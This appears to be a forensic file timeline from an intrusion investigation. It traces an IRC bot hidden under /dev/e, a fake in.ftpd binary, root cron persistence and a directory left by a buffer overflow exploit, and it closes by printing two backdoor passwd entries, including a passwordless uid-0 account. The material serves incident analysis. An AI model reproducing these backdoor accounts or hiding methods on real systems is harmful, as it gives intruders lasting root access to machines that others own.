Fri Apr  7 04:08:38 2000  Tue Feb 22 13:17:27 2000  /dev/e/eggdrop1.4.2/src/mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:13:30 2000  /dev/e/eggdrop1.4.2/src/mod/assoc.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:13:35 2000  /dev/e/eggdrop1.4.2/src/mod/blowfish.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:14:30 2000  /dev/e/eggdrop1.4.2/src/mod/channels.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:14:34 2000  /dev/e/eggdrop1.4.2/src/mod/console.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:14:38 2000  /dev/e/eggdrop1.4.2/src/mod/ctcp.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:15:12 2000  /dev/e/eggdrop1.4.2/src/mod/filesys.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:16:06 2000  /dev/e/eggdrop1.4.2/src/mod/irc.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:16:17 2000  /dev/e/eggdrop1.4.2/src/mod/notes.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:16:23 2000  /dev/e/eggdrop1.4.2/src/mod/seen.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:16:44 2000  /dev/e/eggdrop1.4.2/src/mod/server.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:17:02 2000  /dev/e/eggdrop1.4.2/src/mod/share.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:17:19 2000  /dev/e/eggdrop1.4.2/src/mod/transfer.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:17:26 2000  /dev/e/eggdrop1.4.2/src/mod/wire.mod
Fri Apr  7 04:08:38 2000  Tue Feb 22 13:17:27 2000  /dev/e/eggdrop1.4.2/src/mod/woobie.mod
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:09:56 2000  /dev/e/eggdrop1.4.2/src/mod/Makefile
Tue Feb 22 13:13:30 2000  Tue Feb 22 13:13:30 2000  /dev/e/eggdrop1.4.2/src/mod/assoc.o
Tue Feb 22 13:13:36 2000  Tue Feb 22 13:13:35 2000  /dev/e/eggdrop1.4.2/src/mod/blowfish.o
Tue Feb 22 13:14:30 2000  Tue Feb 22 13:14:30 2000  /dev/e/eggdrop1.4.2/src/mod/channels.o
Tue Feb 22 13:14:34 2000  Tue Feb 22 13:14:34 2000  /dev/e/eggdrop1.4.2/src/mod/console.o
Tue Feb 22 13:14:38 2000  Tue Feb 22 13:14:38 2000  /dev/e/eggdrop1.4.2/src/mod/ctcp.o
Tue Feb 22 13:15:12 2000  Tue Feb 22 13:15:12 2000  /dev/e/eggdrop1.4.2/src/mod/filesys.o
Tue Feb 22 13:16:06 2000  Tue Feb 22 13:16:06 2000  /dev/e/eggdrop1.4.2/src/mod/irc.o
Tue Feb 22 13:16:18 2000  Tue Feb 22 13:16:17 2000  /dev/e/eggdrop1.4.2/src/mod/notes.o
Tue Feb 22 13:16:23 2000  Tue Feb 22 13:16:23 2000  /dev/e/eggdrop1.4.2/src/mod/seen.o
Tue Feb 22 13:16:44 2000  Tue Feb 22 13:16:44 2000  /dev/e/eggdrop1.4.2/src/mod/server.o
Tue Feb 22 13:17:02 2000  Tue Feb 22 13:17:02 2000  /dev/e/eggdrop1.4.2/src/mod/share.o
Tue Feb 22 13:17:19 2000  Tue Feb 22 13:17:19 2000  /dev/e/eggdrop1.4.2/src/mod/transfer.o
Tue Feb 22 13:17:26 2000  Tue Feb 22 13:17:26 2000  /dev/e/eggdrop1.4.2/src/mod/wire.o
Tue Feb 22 13:17:28 2000  Tue Feb 22 13:17:27 2000  /dev/e/eggdrop1.4.2/src/mod/woobie.o
Tue Feb 22 13:10:32 2000  Tue Feb 22 13:09:55 2000  /dev/e/eggdrop1.4.2/src/Makefile
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:10:42 2000  /dev/e/eggdrop1.4.2/src/botcmd.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:10:49 2000  /dev/e/eggdrop1.4.2/src/botmsg.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:11:03 2000  /dev/e/eggdrop1.4.2/src/botnet.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:11:08 2000  /dev/e/eggdrop1.4.2/src/chanprog.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:11:30 2000  /dev/e/eggdrop1.4.2/src/cmds.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:11:45 2000  /dev/e/eggdrop1.4.2/src/dcc.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:11:50 2000  /dev/e/eggdrop1.4.2/src/dccutil.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:11:55 2000  /dev/e/eggdrop1.4.2/src/flags.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:11:59 2000  /dev/e/eggdrop1.4.2/src/language.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:12:05 2000  /dev/e/eggdrop1.4.2/src/main.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:12:06 2000  /dev/e/eggdrop1.4.2/src/mem.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:12:15 2000  /dev/e/eggdrop1.4.2/src/misc.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:12:18 2000  /dev/e/eggdrop1.4.2/src/modules.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:12:26 2000  /dev/e/eggdrop1.4.2/src/net.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:12:28 2000  /dev/e/eggdrop1.4.2/src/rfc1459.o
Tue Feb 22 13:13:25 2000  Tue Feb 22 13:12:32 2000  /dev/e/eggdrop1.4.2/src/tcl.o
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:12:42 2000  /dev/e/eggdrop1.4.2/src/tcldcc.o
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:12:50 2000  /dev/e/eggdrop1.4.2/src/tclhash.o
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:12:54 2000  /dev/e/eggdrop1.4.2/src/tclmisc.o
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:12:58 2000  /dev/e/eggdrop1.4.2/src/tcluser.o
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:13:05 2000  /dev/e/eggdrop1.4.2/src/userent.o
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:13:10 2000  /dev/e/eggdrop1.4.2/src/userrec.o
Tue Feb 22 13:13:26 2000  Tue Feb 22 13:13:21 2000  /dev/e/eggdrop1.4.2/src/users.o
Tue Feb 22 13:10:31 2000  Tue Feb 22 13:09:54 2000  /dev/e/eggdrop1.4.2/Makefile
Tue Feb 22 13:09:29 2000  Tue Feb 22 13:09:52 2000  /dev/e/eggdrop1.4.2/config.log
Tue Feb 22 13:17:26 2000  Tue Feb 22 13:09:58 2000  /dev/e/eggdrop1.4.2/config.h
Tue Feb 22 13:09:29 2000  Tue Feb 22 13:09:52 2000  /dev/e/eggdrop1.4.2/config.cache
Tue Feb 22 13:09:58 2000  Tue Feb 22 13:09:53 2000  /dev/e/eggdrop1.4.2/config.status
Tue Feb 22 13:10:31 2000  Tue Feb 22 13:10:31 2000  /dev/e/eggdrop1.4.2/EGGMOD.stamp
Tue Feb 22 13:17:26 2000  Tue Feb 22 13:09:56 2000  /dev/e/eggdrop1.4.2/lush.h
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:13:30 2000  /dev/e/eggdrop1.4.2/assoc.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:13:36 2000  /dev/e/eggdrop1.4.2/blowfish.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:14:30 2000  /dev/e/eggdrop1.4.2/channels.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:14:34 2000  /dev/e/eggdrop1.4.2/console.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:14:38 2000  /dev/e/eggdrop1.4.2/ctcp.so
Tue Feb 22 13:15:12 2000  Tue Feb 22 13:15:12 2000  /dev/e/eggdrop1.4.2/filesys.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:16:06 2000  /dev/e/eggdrop1.4.2/irc.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:16:18 2000  /dev/e/eggdrop1.4.2/notes.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:16:23 2000  /dev/e/eggdrop1.4.2/seen.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:16:44 2000  /dev/e/eggdrop1.4.2/server.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:17:02 2000  /dev/e/eggdrop1.4.2/share.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:17:19 2000  /dev/e/eggdrop1.4.2/transfer.so
Mon Apr 10 11:50:01 2000  Tue Feb 22 13:17:26 2000  /dev/e/eggdrop1.4.2/wire.so
Tue Feb 22 13:17:28 2000  Tue Feb 22 13:17:28 2000  /dev/e/eggdrop1.4.2/woobie.so
Tue Feb 22 13:46:31 2000  Tue Feb 22 13:45:55 2000  /dev/e/eggdrop1.4.2/cron
Mon Apr 10 11:50:00 2000  Tue Feb 22 13:13:26 2000  /dev/e/eggdrop1.4.2/in.ftpd
Mon Apr 10 11:46:32 2000  Tue Feb 22 13:46:31 2000  /var/spool/cron
Mon Apr 10 11:52:02 2000  Tue Feb 22 13:46:31 2000  /var/spool/cron/root
Fri Apr  7 04:08:39 2000  Tue Feb 22 07:40:02 2000  /var/named
Fri Apr  7 04:08:39 2000  Tue Feb 22 07:40:02 2000  /var/named/ADMROCKS (empty directory created by the buffer overflow program)
Tue Apr  4 12:28:58 2000  Tue Feb 22 13:06:28 2000  /root/.ncftp/firewall
Tue Apr  4 12:28:58 2000  Tue Feb 22 13:09:00 2000  /root/.ncftp/prefs

The hacker backdoor accounts:

server::0:0::/:/bin/bash
cove:x:900:100::/tmp:/bin/bash
References:
Original files and logging at 137.189.victim2
.bash_history